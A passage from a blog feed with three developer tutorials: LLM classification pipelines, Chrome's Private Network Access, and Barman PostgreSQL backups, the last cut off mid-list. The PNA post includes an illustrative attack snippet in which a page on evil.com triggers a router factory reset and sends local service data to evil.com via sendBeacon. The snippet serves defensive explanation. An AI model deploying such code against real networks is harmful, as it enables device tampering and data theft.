]]></content:encoded></item><item><title><![CDATA[Why Your LLM Classification Pipeline Fails on Edge Cases (and How to Fix It)]]></title><description><![CDATA[A Harvard study recently made waves: OpenAI's o1 model reportedly diagnosed 67% of emergency room patients correctly, compared to 50-55% accuracy from triage doctors. Whether or not that number holds up under scrutiny, it highlights something develop...]]></description><link>https://alan-west.hashnode.dev/why-your-llm-classification-pipeline-fails-on-edge-cases-and-how-to-fix-it</link><guid isPermaLink="true">https://alan-west.hashnode.dev/why-your-llm-classification-pipeline-fails-on-edge-cases-and-how-to-fix-it</guid><category><![CDATA[AI]]></category><category><![CDATA[MachineLearning]]></category><category><![CDATA[General Programming]]></category><category><![CDATA[Python]]></category><dc:creator><![CDATA[Alan West]]></dc:creator><pubDate>Mon, 04 May 2026 00:41:21 GMT</pubDate><enclosure url="https://images.pexels.com/photos/17483874/pexels-photo-17483874.png?auto=compress&amp;cs=tinysrgb&amp;fit=crop&amp;h=627&amp;w=1200" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>A Harvard study recently made waves: OpenAI's o1 model reportedly diagnosed 67% of emergency room patients correctly, compared to 50-55% accuracy from triage doctors. Whether or not that number holds up under scrutiny, it highlights something developers building AI classification systems already know — LLMs can be surprisingly good at pattern matching across messy, unstructured input.</p>
<p>But here's the part nobody's tweeting about: getting an LLM to perform well in a research setting and getting it to perform reliably in a production pipeline are two completely different problems.</p>
<p>I've spent the last year building classification systems that use LLMs for intake processing, risk scoring, and routing decisions. The accuracy numbers looked great in testing. Then production traffic hit, and things got weird fast.</p>
<p>Let me walk you through the failure modes I encountered and how I fixed each one.</p>
<h2 id="heading-the-core-problem-inconsistent-output-on-ambiguous-input">The Core Problem: Inconsistent Output on Ambiguous Input</h2>
<p>Here's the scenario. You've got an LLM classifying incoming data into categories — could be support tickets, insurance claims, medical symptoms, whatever. Your eval set shows 85% accuracy. You ship it.</p>
<p>Within a week, you notice:</p>
<ul>
<li>The same input produces different classifications on retry</li>
<li>Edge cases get confidently wrong answers (no hedging, no uncertainty)</li>
<li>The model hallucinates categories that don't exist in your schema</li>
</ul>
<p>Sound familiar? The root cause is almost always the same: <strong>you're treating a probabilistic text generator like a deterministic function</strong>.</p>
<h2 id="heading-step-1-lock-down-your-output-schema">Step 1: Lock Down Your Output Schema</h2>
<p>The first fix is embarrassingly simple. Stop accepting free-text classification output.</p>
<pre><code class="lang-python"><span class="hljs-keyword">import</span> json
<span class="hljs-keyword">from</span> pydantic <span class="hljs-keyword">import</span> BaseModel, Field
<span class="hljs-keyword">from</span> enum <span class="hljs-keyword">import</span> Enum

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">TriageCategory</span>(<span class="hljs-params">str, Enum</span>):</span>
    CRITICAL = <span class="hljs-string">"critical"</span>
    URGENT = <span class="hljs-string">"urgent"</span>
    STANDARD = <span class="hljs-string">"standard"</span>
    LOW = <span class="hljs-string">"low"</span>

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">ClassificationResult</span>(<span class="hljs-params">BaseModel</span>):</span>
    category: TriageCategory
    confidence: float = Field(ge=<span class="hljs-number">0.0</span>, le=<span class="hljs-number">1.0</span>)
    reasoning: str = Field(max_length=<span class="hljs-number">500</span>)
    <span class="hljs-comment"># Forces the model to flag when it's unsure</span>
    ambiguous: bool = <span class="hljs-literal">False</span>
    differential: list[TriageCategory] = []  <span class="hljs-comment"># other possible categories</span>

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">validate_classification</span>(<span class="hljs-params">raw_output: str</span>) -&gt; ClassificationResult:</span>
    <span class="hljs-keyword">try</span>:
        data = json.loads(raw_output)
        <span class="hljs-keyword">return</span> ClassificationResult(**data)
    <span class="hljs-keyword">except</span> (json.JSONDecodeError, ValueError) <span class="hljs-keyword">as</span> e:
        <span class="hljs-comment"># Don't silently fall back — route to human review</span>
        <span class="hljs-keyword">raise</span> ClassificationError(<span class="hljs-string">f"Model output failed validation: <span class="hljs-subst">{e}</span>"</span>)
</code></pre>
<p>The <code>differential</code> field is the key insight I stole from actual medical practice. When doctors aren't sure, they don't just pick one answer — they list the possibilities. Your model should do the same.</p>
<p>If you're using an API that supports structured outputs or function calling, use that instead of parsing raw text. It eliminates an entire class of formatting errors.</p>
<h2 id="heading-step-2-calibrate-confidence-scores-theyre-lying-to-you">Step 2: Calibrate Confidence Scores (They're Lying to You)</h2>
<p>Here's something that bit me hard. When you ask an LLM to self-report confidence, those numbers are essentially made up. A model that says it's 95% confident is not actually right 95% of the time.</p>
<pre><code class="lang-python"><span class="hljs-keyword">import</span> numpy <span class="hljs-keyword">as</span> np
<span class="hljs-keyword">from</span> collections <span class="hljs-keyword">import</span> defaultdict

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">ConfidenceCalibrator</span>:</span>
    <span class="hljs-string">"""Post-hoc calibration using historical predictions vs. outcomes."""</span>

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span>(<span class="hljs-params">self, n_bins: int = <span class="hljs-number">10</span></span>):</span>
        self.n_bins = n_bins
        self.bin_boundaries = np.linspace(<span class="hljs-number">0</span>, <span class="hljs-number">1</span>, n_bins + <span class="hljs-number">1</span>)
        self.calibration_map: dict[int, float] = {}

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">fit</span>(<span class="hljs-params">self, predicted_confidences: list[float], actual_correct: list[bool]</span>):</span>
        <span class="hljs-string">"""Build calibration curve from labeled evaluation data."""</span>
        bins = defaultdict(list)

        <span class="hljs-keyword">for</span> conf, correct <span class="hljs-keyword">in</span> zip(predicted_confidences, actual_correct):
            bin_idx = int(np.digitize(conf, self.bin_boundaries)) - <span class="hljs-number">1</span>
            bin_idx = min(bin_idx, self.n_bins - <span class="hljs-number">1</span>)
            bins[bin_idx].append(correct)

        <span class="hljs-keyword">for</span> bin_idx, outcomes <span class="hljs-keyword">in</span> bins.items():
            <span class="hljs-comment"># Actual accuracy for this confidence range</span>
            self.calibration_map[bin_idx] = sum(outcomes) / len(outcomes)

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">calibrate</span>(<span class="hljs-params">self, raw_confidence: float</span>) -&gt; float:</span>
        <span class="hljs-string">"""Map model's claimed confidence to actual observed accuracy."""</span>
        bin_idx = int(np.digitize(raw_confidence, self.bin_boundaries)) - <span class="hljs-number">1</span>
        bin_idx = min(bin_idx, self.n_bins - <span class="hljs-number">1</span>)
        <span class="hljs-keyword">return</span> self.calibration_map.get(bin_idx, raw_confidence)
</code></pre>
<p>In my experience, LLMs are consistently overconfident in the 0.7-0.9 range. After calibration, a lot of those "85% confident" predictions turned out to be correct about 60% of the time. That's a massive difference when you're routing decisions based on those numbers.</p>
<h2 id="heading-step-3-build-a-human-in-the-loop-escalation-path">Step 3: Build a Human-in-the-Loop Escalation Path</h2>
<p>This is where most teams cut corners, and it's where the Harvard study comparison gets interesting. The study compared AI-only vs. doctor-only. But in practice, the winning architecture is neither — it's AI + human with clear escalation rules.</p>
<pre><code class="lang-python"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">EscalationRouter</span>:</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span>(<span class="hljs-params">self, calibrator: ConfidenceCalibrator, 
                 auto_threshold: float = <span class="hljs-number">0.85</span>,
                 reject_threshold: float = <span class="hljs-number">0.5</span></span>):</span>
        self.calibrator = calibrator
        self.auto_threshold = auto_threshold
        self.reject_threshold = reject_threshold

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">route</span>(<span class="hljs-params">self, result: ClassificationResult</span>) -&gt; str:</span>
        calibrated = self.calibrator.calibrate(result.confidence)

        <span class="hljs-comment"># High confidence + no ambiguity = auto-process</span>
        <span class="hljs-keyword">if</span> calibrated &gt;= self.auto_threshold <span class="hljs-keyword">and</span> <span class="hljs-keyword">not</span> result.ambiguous:
            <span class="hljs-keyword">return</span> <span class="hljs-string">"auto_accept"</span>

        <span class="hljs-comment"># Model flagged ambiguity or differential has close alternatives</span>
        <span class="hljs-keyword">if</span> result.ambiguous <span class="hljs-keyword">or</span> len(result.differential) &gt; <span class="hljs-number">1</span>:
            <span class="hljs-keyword">return</span> <span class="hljs-string">"human_review_priority"</span>

        <span class="hljs-comment"># Low confidence = don't even try</span>
        <span class="hljs-keyword">if</span> calibrated &lt; self.reject_threshold:
            <span class="hljs-keyword">return</span> <span class="hljs-string">"human_review_required"</span>

        <span class="hljs-comment"># Middle ground: accept but flag for async audit</span>
        <span class="hljs-keyword">return</span> <span class="hljs-string">"auto_accept_with_audit"</span>
</code></pre>
<p>The <code>auto_accept_with_audit</code> path is crucial. It lets you process the majority of clear-cut cases automatically while building a feedback dataset from the audited ones. After a few weeks, you've got labeled data to retrain your calibration curve.</p>
<h2 id="heading-step-4-use-eval-driven-development-not-vibes">Step 4: Use Eval-Driven Development, Not Vibes</h2>
<p>The reason that Harvard study is useful isn't the headline number — it's that they had a clear evaluation methodology. Your classification system needs the same thing.</p>
<pre><code class="lang-python"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">run_eval_suite</span>(<span class="hljs-params">classify_fn, test_cases: list[dict]</span>) -&gt; dict:</span>
    results = {
        <span class="hljs-string">"total"</span>: len(test_cases),
        <span class="hljs-string">"correct"</span>: <span class="hljs-number">0</span>,
        <span class="hljs-string">"incorrect_but_flagged"</span>: <span class="hljs-number">0</span>,  <span class="hljs-comment"># wrong, but model said ambiguous</span>
        <span class="hljs-string">"incorrect_confident"</span>: <span class="hljs-number">0</span>,    <span class="hljs-comment"># wrong AND confident — the scary ones</span>
        <span class="hljs-string">"consistency"</span>: []             <span class="hljs-comment"># same input, multiple runs</span>
    }

    <span class="hljs-keyword">for</span> case <span class="hljs-keyword">in</span> test_cases:
        <span class="hljs-comment"># Run each case 3 times to check consistency</span>
        outputs = [classify_fn(case[<span class="hljs-string">"input"</span>]) <span class="hljs-keyword">for</span> _ <span class="hljs-keyword">in</span> range(<span class="hljs-number">3</span>)]
        categories = [o.category <span class="hljs-keyword">for</span> o <span class="hljs-keyword">in</span> outputs]

        results[<span class="hljs-string">"consistency"</span>].append(len(set(categories)) == <span class="hljs-number">1</span>)

        <span class="hljs-comment"># Use majority vote for accuracy check</span>
        <span class="hljs-keyword">from</span> collections <span class="hljs-keyword">import</span> Counter
        majority = Counter(categories).most_common(<span class="hljs-number">1</span>)[<span class="hljs-number">0</span>][<span class="hljs-number">0</span>]

        <span class="hljs-keyword">if</span> majority == case[<span class="hljs-string">"expected"</span>]:
            results[<span class="hljs-string">"correct"</span>] += <span class="hljs-number">1</span>
        <span class="hljs-keyword">elif</span> any(o.ambiguous <span class="hljs-keyword">for</span> o <span class="hljs-keyword">in</span> outputs):
            results[<span class="hljs-string">"incorrect_but_flagged"</span>] += <span class="hljs-number">1</span>
        <span class="hljs-keyword">else</span>:
            results[<span class="hljs-string">"incorrect_confident"</span>] += <span class="hljs-number">1</span>

    results[<span class="hljs-string">"consistency_rate"</span>] = sum(results[<span class="hljs-string">"consistency"</span>]) / len(results[<span class="hljs-string">"consistency"</span>])
    <span class="hljs-keyword">return</span> results
</code></pre>
<p>The metric I care about most isn't overall accuracy — it's <code>incorrect_confident</code>. That's the failure mode that causes real damage. A system that's wrong 20% of the time but flags uncertainty is infinitely more useful than one that's wrong 15% of the time but never tells you.</p>
<h2 id="heading-prevention-the-production-checklist">Prevention: The Production Checklist</h2>
<p>Before you ship any LLM classification pipeline to production:</p>
<ul>
<li><strong>Structured output validation</strong> — never trust raw text parsing for critical paths</li>
<li><strong>Calibrated confidence</strong> — run at least 200 labeled examples through calibration before going live</li>
<li><strong>Escalation routing</strong> — define explicit thresholds for auto-accept, audit, and human-review</li>
<li><strong>Consistency testing</strong> — if the same input gives different outputs on retry, your temperature is too high or your prompt is ambiguous</li>
<li><strong>Eval suite in CI</strong> — run your test cases on every prompt change, every model version bump</li>
<li><strong>Monitoring in production</strong> — track confidence distribution drift over time. If your model suddenly gets more confident or less confident across the board, something changed</li>
</ul>
<h2 id="heading-the-bigger-picture">The Bigger Picture</h2>
<p>The headline "AI beats doctors" is reductive. What the research actually suggests is that LLMs are good at synthesizing patterns across large amounts of unstructured text — which is literally what they were built to do.</p>
<p>The developer takeaway isn't "replace humans with LLMs." It's that a well-built classification pipeline with proper calibration, structured outputs, and human escalation can outperform either humans or AI working alone.</p>
<p>Build the pipeline right, measure it honestly, and don't trust the confidence scores until you've calibrated them. That's it. That's the whole thing.</p>
]]></content:encoded></item><item><title><![CDATA[Why Every Website Wants to Access Your Local Network (And What to Do About It)]]></title><description><![CDATA[If you've been browsing the web recently, you've probably noticed a new kind of permission prompt popping up: "This site wants to access devices on your local network." It showed up for me on a random dashboard I was building, and my first thought wa...]]></description><link>https://alan-west.hashnode.dev/why-every-website-wants-to-access-your-local-network-and-what-to-do-about-it</link><guid isPermaLink="true">https://alan-west.hashnode.dev/why-every-website-wants-to-access-your-local-network-and-what-to-do-about-it</guid><category><![CDATA[Browsers]]></category><category><![CDATA[JavaScript]]></category><category><![CDATA[Security]]></category><category><![CDATA[webdev]]></category><dc:creator><![CDATA[Alan West]]></dc:creator><pubDate>Sun, 03 May 2026 20:42:28 GMT</pubDate><enclosure url="https://images.pexels.com/photos/4086968/pexels-photo-4086968.jpeg?auto=compress&amp;cs=tinysrgb&amp;fit=crop&amp;h=627&amp;w=1200" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>If you've been browsing the web recently, you've probably noticed a new kind of permission prompt popping up: "This site wants to access devices on your local network." It showed up for me on a random dashboard I was building, and my first thought was — wait, <em>I</em> wrote this app, why is the browser asking me this?</p>
<p>Turns out, this is Chrome's rollout of <strong>Private Network Access</strong> (PNA), and it's changing how web apps interact with local resources. If you're a developer who builds anything that talks to localhost, IoT devices, printers, or internal APIs, you need to understand this.</p>
<h2 id="heading-whats-actually-happening">What's Actually Happening</h2>
<p>Private Network Access is a security specification (formerly known as CORS-RFC1918) that prevents public websites from silently making requests to resources on your private or local network. The browser now classifies all network destinations into three buckets:</p>
<ul>
<li><strong>Public</strong> — any globally routable IP address</li>
<li><strong>Private</strong> — RFC 1918 ranges like <code>10.x.x.x</code>, <code>172.16.x.x</code>–<code>172.31.x.x</code>, <code>192.168.x.x</code></li>
<li><strong>Local</strong> — <code>localhost</code> / <code>127.0.0.1</code> / <code>::1</code></li>
</ul>
<p>The rule is simple: requests from a <strong>less private</strong> context to a <strong>more private</strong> context get blocked unless explicitly allowed. A page served from a public server can't just silently hit <code>192.168.1.1</code> anymore.</p>
<h2 id="heading-why-this-exists-and-why-its-a-good-thing">Why This Exists (And Why It's a Good Thing)</h2>
<p>For years, attackers have exploited the trust relationship between your browser and your local network. A malicious website could fire off requests to your router's admin panel, poke at internal company APIs, or scan for IoT devices — all without you knowing.</p>
<p>The classic attack looks something like this:</p>
<pre><code class="lang-html"><span class="hljs-comment">&lt;!-- Malicious page served from evil.com --&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">img</span> <span class="hljs-attr">src</span>=<span class="hljs-string">"http://192.168.1.1/admin/factory_reset"</span> /&gt;</span>

<span class="hljs-comment">&lt;!-- Or something sneakier --&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><span class="javascript">
  <span class="hljs-comment">// Scan common local ports to fingerprint internal services</span>
  fetch(<span class="hljs-string">'http://localhost:8080/api/health'</span>)
    .then(<span class="hljs-function"><span class="hljs-params">r</span> =&gt;</span> r.json())
    .then(<span class="hljs-function"><span class="hljs-params">data</span> =&gt;</span> {
      <span class="hljs-comment">// Exfiltrate info about what's running locally</span>
      navigator.sendBeacon(<span class="hljs-string">'https://evil.com/collect'</span>, <span class="hljs-built_in">JSON</span>.stringify(data));
    })
    .catch(<span class="hljs-function">() =&gt;</span> {}); <span class="hljs-comment">// silently fail, try next port</span>
</span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span>
</code></pre>
<p>DNS rebinding attacks are even nastier — an attacker's domain resolves to their server initially, then switches to <code>127.0.0.1</code> after the page loads, bypassing same-origin policy. PNA shuts this down at the network level.</p>
<h2 id="heading-how-it-works-under-the-hood">How It Works Under the Hood</h2>
<p>When your page tries to make a request from a public context to a private/local address, Chrome now sends a <strong>CORS preflight</strong> with a special header:</p>
<pre><code class="lang-http"><span class="hljs-keyword">OPTIONS</span> <span class="hljs-string">/api/data</span> HTTP/1.1
<span class="hljs-attribute">Host</span>: 192.168.1.50:3000
<span class="hljs-attribute">Origin</span>: https://myapp.example.com
<span class="hljs-attribute">Access-Control-Request-Method</span>: GET
<span class="hljs-attribute">Access-Control-Request-Private-Network</span>: true
</code></pre>
<p>Your local server needs to respond with:</p>
<pre><code class="lang-http">HTTP/1.1 <span class="hljs-number">200</span> OK
<span class="hljs-attribute">Access-Control-Allow-Origin</span>: https://myapp.example.com
<span class="hljs-attribute">Access-Control-Allow-Private-Network</span>: true
</code></pre>
<p>If the server doesn't include <code>Access-Control-Allow-Private-Network: true</code> in the preflight response, the browser blocks the actual request. No negotiation, no fallback.</p>
<h2 id="heading-fixing-it-for-your-dev-environment">Fixing It for Your Dev Environment</h2>
<p>This is where most developers first run into PNA — your frontend is served from a deployed domain (or even a local dev server on one port) and it's trying to hit an API on another local port. Here's how to handle it.</p>
<h3 id="heading-option-1-add-the-pna-headers-to-your-server">Option 1: Add the PNA Headers to Your Server</h3>
<p>If you control the local server, add the proper CORS preflight handling. Here's an example with Express:</p>
<pre><code class="lang-javascript"><span class="hljs-keyword">const</span> express = <span class="hljs-built_in">require</span>(<span class="hljs-string">'express'</span>);
<span class="hljs-keyword">const</span> app = express();

app.use(<span class="hljs-function">(<span class="hljs-params">req, res, next</span>) =&gt;</span> {
  <span class="hljs-comment">// Handle the PNA preflight</span>
  <span class="hljs-keyword">if</span> (req.method === <span class="hljs-string">'OPTIONS'</span>) {
    res.setHeader(<span class="hljs-string">'Access-Control-Allow-Origin'</span>, req.headers.origin || <span class="hljs-string">'*'</span>);
    res.setHeader(<span class="hljs-string">'Access-Control-Allow-Methods'</span>, <span class="hljs-string">'GET, POST, PUT, DELETE'</span>);
    res.setHeader(<span class="hljs-string">'Access-Control-Allow-Headers'</span>, <span class="hljs-string">'Content-Type, Authorization'</span>);

    <span class="hljs-comment">// This is the key header for Private Network Access</span>
    res.setHeader(<span class="hljs-string">'Access-Control-Allow-Private-Network'</span>, <span class="hljs-string">'true'</span>);

    <span class="hljs-keyword">return</span> res.status(<span class="hljs-number">200</span>).end();
  }

  res.setHeader(<span class="hljs-string">'Access-Control-Allow-Origin'</span>, req.headers.origin || <span class="hljs-string">'*'</span>);
  next();
});

app.get(<span class="hljs-string">'/api/data'</span>, <span class="hljs-function">(<span class="hljs-params">req, res</span>) =&gt;</span> {
  res.json({ <span class="hljs-attr">status</span>: <span class="hljs-string">'ok'</span> });
});

app.listen(<span class="hljs-number">3000</span>);
</code></pre>
<h3 id="heading-option-2-use-a-reverse-proxy">Option 2: Use a Reverse Proxy</h3>
<p>If you don't control the local service (like a printer interface or an IoT device), you can proxy through your own backend. This keeps everything within the same origin and avoids the PNA check entirely.</p>
<pre><code class="lang-nginx"><span class="hljs-comment"># nginx.conf — proxy local device through your server</span>
<span class="hljs-section">server</span> {
    <span class="hljs-attribute">listen</span> <span class="hljs-number">443</span> ssl;
    <span class="hljs-attribute">server_name</span> myapp.example.com;

    <span class="hljs-attribute">location</span> /api/local-device/ {
        <span class="hljs-comment"># Forward to the device on the local network</span>
        <span class="hljs-attribute">proxy_pass</span> http://192.168.1.50:8080/;
        <span class="hljs-attribute">proxy_set_header</span> Host <span class="hljs-variable">$host</span>;
        <span class="hljs-attribute">proxy_set_header</span> X-Real-IP <span class="hljs-variable">$remote_addr</span>;
    }
}
</code></pre>
<p>Now your frontend hits <code>https://myapp.example.com/api/local-device/status</code> and the proxy handles the local network hop server-side. No browser permission prompt, no PNA preflight.</p>
<h3 id="heading-option-3-serve-everything-from-the-same-private-context">Option 3: Serve Everything from the Same Private Context</h3>
<p>If both your frontend and API are on the local network, serve them from the same origin. Private-to-private requests within the same address space don't trigger PNA checks.</p>
<pre><code class="lang-bash"><span class="hljs-comment"># Serve your frontend from the same local server</span>
<span class="hljs-comment"># Instead of: frontend on myapp.com hitting localhost:3000</span>
<span class="hljs-comment"># Do: frontend AND api both on localhost:3000</span>
npx serve ./dist -l 3000
</code></pre>
<h2 id="heading-common-gotchas">Common Gotchas</h2>
<p><strong>Mixed content matters.</strong> If your page is served over HTTPS (public), it's extra restricted. A secure public page trying to hit an insecure local endpoint (<code>http://localhost:...</code>) gets blocked even harder. The browser really does not want that combination.</p>
<p><strong>WebSockets are affected too.</strong> PNA applies to WebSocket connections. If your app opens a WebSocket to a local device, the same preflight rules apply — though the handshake mechanism differs slightly from standard CORS preflights.</p>
<p><strong>Chrome flags for testing.</strong> During development, you can temporarily disable this check to unblock yourself:</p>
<pre><code>chrome:<span class="hljs-comment">//flags/#block-insecure-private-network-requests</span>
</code></pre><p>Set it to "Disabled" and restart. But don't ship instructions telling users to do this — that defeats the entire security model.</p>
<h2 id="heading-what-about-other-browsers">What About Other Browsers?</h2>
<p>Chrome is leading this rollout, but the spec is a W3C community effort under the WICG. Firefox and Safari have shown interest but haven't fully implemented the permission prompt yet as of early 2025. Expect this to become standard across all browsers eventually.</p>
<h2 id="heading-prevention-design-for-pna-from-the-start">Prevention: Design for PNA from the Start</h2>
<p>If you're building anything that needs local network access:</p>
<ul>
<li><strong>Architect with a proxy layer.</strong> Don't assume the browser can directly reach local resources from a public origin. Route through your backend.</li>
<li><strong>Add PNA headers to every local service you build.</strong> Make <code>Access-Control-Allow-Private-Network: true</code> part of your CORS middleware from day one.</li>
<li><strong>Use HTTPS everywhere</strong>, even locally. Tools like <code>mkcert</code> make it easy to get trusted local certificates.</li>
<li><strong>Test with PNA enabled.</strong> Don't rely on Chrome flags being off. Test the real user experience.</li>
</ul>
<p>PNA might feel annoying when you first hit it, but it's closing a real class of vulnerabilities that's been open for decades. A few headers and some thoughtful architecture is a small price for keeping your users' local networks safe from drive-by attacks.</p>
]]></content:encoded></item><item><title><![CDATA[Why Your Barman Backups Keep Failing (And How to Actually Fix It)]]></title><description><![CDATA[So you finally set up Barman to handle your PostgreSQL backups. You followed the docs, configured your server, ran barman check and... a wall of FAILED messages stares back at you. Cool. Very reassuring for your disaster recovery strategy.
I've been ...]]></description><link>https://alan-west.hashnode.dev/why-your-barman-backups-keep-failing-and-how-to-actually-fix-it</link><guid isPermaLink="true">https://alan-west.hashnode.dev/why-your-barman-backups-keep-failing-and-how-to-actually-fix-it</guid><category><![CDATA[Backup]]></category><category><![CDATA[database]]></category><category><![CDATA[Devops]]></category><category><![CDATA[PostgreSQL]]></category><dc:creator><![CDATA[Alan West]]></dc:creator><pubDate>Sun, 03 May 2026 18:55:06 GMT</pubDate><enclosure url="https://images.pexels.com/photos/17483870/pexels-photo-17483870.png?auto=compress&amp;cs=tinysrgb&amp;fit=crop&amp;h=627&amp;w=1200" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>So you finally set up Barman to handle your PostgreSQL backups. You followed the docs, configured your server, ran <code>barman check</code> and... a wall of <code>FAILED</code> messages stares back at you. Cool. Very reassuring for your disaster recovery strategy.</p>
<p>I've been through this exact pain on multiple projects. Barman is genuinely excellent backup tooling for PostgreSQL, but the initial setup has several moving parts that all need to work together. Let me walk you through the most common failures and how to systematically fix each one.</p>
<h2 id="heading-the-symptom-barman-check-looks-like-a-crime-scene">The Symptom: <code>barman check</code> Looks Like a Crime Scene</h2>
<p>Here's what a broken Barman setup typically looks like:</p>
<pre><code class="lang-bash">$ barman check mydb
Server mydb:
    PostgreSQL: OK
    is_superuser: OK
    PostgreSQL streaming: FAILED
    WAL archive: FAILED (no WAL file archived yet)
    replication slot: FAILED (slot not found)
    SSH: FAILED
    backup maximum age: FAILED
    compression settings: OK
</code></pre>
<p>Four failures. Each one blocks the next. The trick is knowing the correct order to fix them, because they're actually a dependency chain.</p>
<h2 id="heading-root-cause-1-ssh-isnt-configured-both-ways">Root Cause 1: SSH Isn't Configured Both Ways</h2>
<p>This catches everyone. Barman needs passwordless SSH in <strong>both directions</strong> — from the <code>barman</code> OS user to the <code>postgres</code> OS user on the database host, AND from <code>postgres</code> back to <code>barman</code>. Most people only set up one direction.</p>
<pre><code class="lang-bash"><span class="hljs-comment"># On the Barman host, as the barman user</span>
ssh-keygen -t ed25519 -N <span class="hljs-string">''</span> -f ~/.ssh/id_ed25519
ssh-copy-id postgres@your-db-host

<span class="hljs-comment"># On the DB host, as the postgres user</span>
ssh-keygen -t ed25519 -N <span class="hljs-string">''</span> -f ~/.ssh/id_ed25519
ssh-copy-id barman@your-barman-host
</code></pre>
<p>Verify both directions actually work without a password prompt:</p>
<pre><code class="lang-bash"><span class="hljs-comment"># From barman host</span>
sudo -u barman ssh postgres@your-db-host <span class="hljs-string">"echo ok"</span>

<span class="hljs-comment"># From db host</span>
sudo -u postgres ssh barman@your-barman-host <span class="hljs-string">"echo ok"</span>
</code></pre>
<p>If either one asks for a password, your backups won't work. Period. Check <code>~/.ssh/authorized_keys</code> permissions — SSH is picky about this. The <code>.ssh</code> directory needs <code>700</code> and the <code>authorized_keys</code> file needs <code>600</code>.</p>
<h2 id="heading-root-cause-2-wal-archiving-isnt-actually-enabled">Root Cause 2: WAL Archiving Isn't Actually Enabled</h2>
<p>Barman relies on receiving WAL (Write-Ahead Log) files from PostgreSQL to enable point-in-time recovery. There are two ways to get WAL to Barman, and mixing them up is a classic source of confusion.</p>
<p><strong>Method 1: archive_command (push model)</strong></p>
<p>PostgreSQL pushes WAL files to Barman via SSH. You need to configure this in <code>postgresql.conf</code>:</p>
<pre><code class="lang-ini"><span class="hljs-comment"># postgresql.conf on the database server</span>
<span class="hljs-attr">archive_mode</span> = <span class="hljs-literal">on</span>
<span class="hljs-attr">archive_command</span> = <span class="hljs-string">'barman-archive-wal mydb %p'</span>

<span class="hljs-comment"># Requires barman-cli package installed on the DB host</span>
</code></pre>
<p>The gotcha here: <code>archive_mode</code> requires a <strong>full server restart</strong>, not just a reload. I've lost an embarrassing amount of time wondering why <code>archive_command</code> wasn't firing, only to realize <code>archive_mode</code> was still <code>off</code> because I only did <code>pg_ctl reload</code>.</p>
<p><strong>Method 2: Streaming via pg_receivewal (pull model)</strong></p>
<p>Barman pulls WAL using PostgreSQL's streaming replication protocol. This is more reliable and my preferred approach. In your Barman server config:</p>
<pre><code class="lang-ini"><span class="hljs-comment"># /etc/barman.d/mydb.conf</span>
<span class="hljs-section">[mydb]</span>
<span class="hljs-attr">description</span> = <span class="hljs-string">"Production DB"</span>
<span class="hljs-attr">conninfo</span> = host=your-db-host user=barman dbname=postgres
<span class="hljs-attr">streaming_conninfo</span> = host=your-db-host user=streaming_barman
<span class="hljs-attr">backup_method</span> = postgres
<span class="hljs-attr">streaming_archiver</span> = <span class="hljs-literal">on</span>
<span class="hljs-attr">replication_slot_name</span> = barman
</code></pre>
<p>You can actually run both methods simultaneously for redundancy, which is what I do in production. Belt and suspenders.</p>
<h2 id="heading-root-cause-3-the-replication-slot-doesnt-exist-yet">Root Cause 3: The Replication Slot Doesn't Exist Yet</h2>
<p>If you set <code>replication_slot_name</code> in the config (and you should, to prevent WAL files from being recycled before Barman grabs them), you need to explicitly create it:</p>
<pre><code class="lang-bash"><span class="hljs-comment"># Create the replication slot</span>
barman receive-wal --create-slot mydb

<span class="hljs-comment"># Then start the WAL receiver</span>
barman receive-wal mydb
</code></pre>
<p>A warning here: if a replication slot exists but Barman isn't consuming from it, <strong>PostgreSQL will keep every WAL file forever</strong>. I've seen this fill up a production disk at 3 AM. Not fun. Monitor your replication slot lag.</p>
<p>You can check the slot status from PostgreSQL directly:</p>
<pre><code class="lang-sql"><span class="hljs-keyword">SELECT</span> slot_name, active, restart_lsn,
       pg_wal_lsn_diff(pg_current_wal_lsn(), restart_lsn) <span class="hljs-keyword">AS</span> lag_bytes
<span class="hljs-keyword">FROM</span> pg_replication_slots
<span class="hljs-keyword">WHERE</span> slot_name = <span class="hljs-string">'barman'</span>;
</code></pre>
<h2 id="heading-root-cause-4-the-cron-job-is-missing">Root Cause 4: The Cron Job Is Missing</h2>
<p>This is the sneaky one. Barman doesn't run as a daemon. It relies on <code>barman cron</code> being executed regularly — typically every minute — to perform WAL archiving, manage <code>pg_receivewal</code> processes, and enforce retention policies.</p>
<pre><code class="lang-bash"><span class="hljs-comment"># Add to the barman user's crontab</span>
sudo -u barman crontab -e

<span class="hljs-comment"># Add this line:</span>
* * * * * /usr/bin/barman cron
</code></pre>
<p>Without this, <code>pg_receivewal</code> won't start, WAL files won't be processed from the incoming directory, and old backups will pile up ignoring your retention policy. I've audited setups where everything was configured perfectly but nobody added the cron entry. <code>barman check</code> just silently showed failures.</p>
<h2 id="heading-the-fix-a-systematic-checklist">The Fix: A Systematic Checklist</h2>
<p>Here's the order I follow every time I set up Barman on a new server:</p>
<ol>
<li><strong>Install Barman</strong> on the backup host and <strong>barman-cli</strong> on the database host</li>
<li><strong>Set up bidirectional SSH</strong> between the <code>barman</code> and <code>postgres</code> users</li>
<li><strong>Configure the PostgreSQL side</strong> — <code>archive_mode</code>, WAL level, connection permissions in <code>pg_hba.conf</code></li>
<li><strong>Create the Barman server config</strong> in <code>/etc/barman.d/</code></li>
<li><strong>Create the replication slot</strong>: <code>barman receive-wal --create-slot mydb</code></li>
<li><strong>Set up the cron job</strong> for <code>barman cron</code></li>
<li><strong>Force a WAL switch</strong> to verify the pipeline: <code>barman switch-wal mydb</code></li>
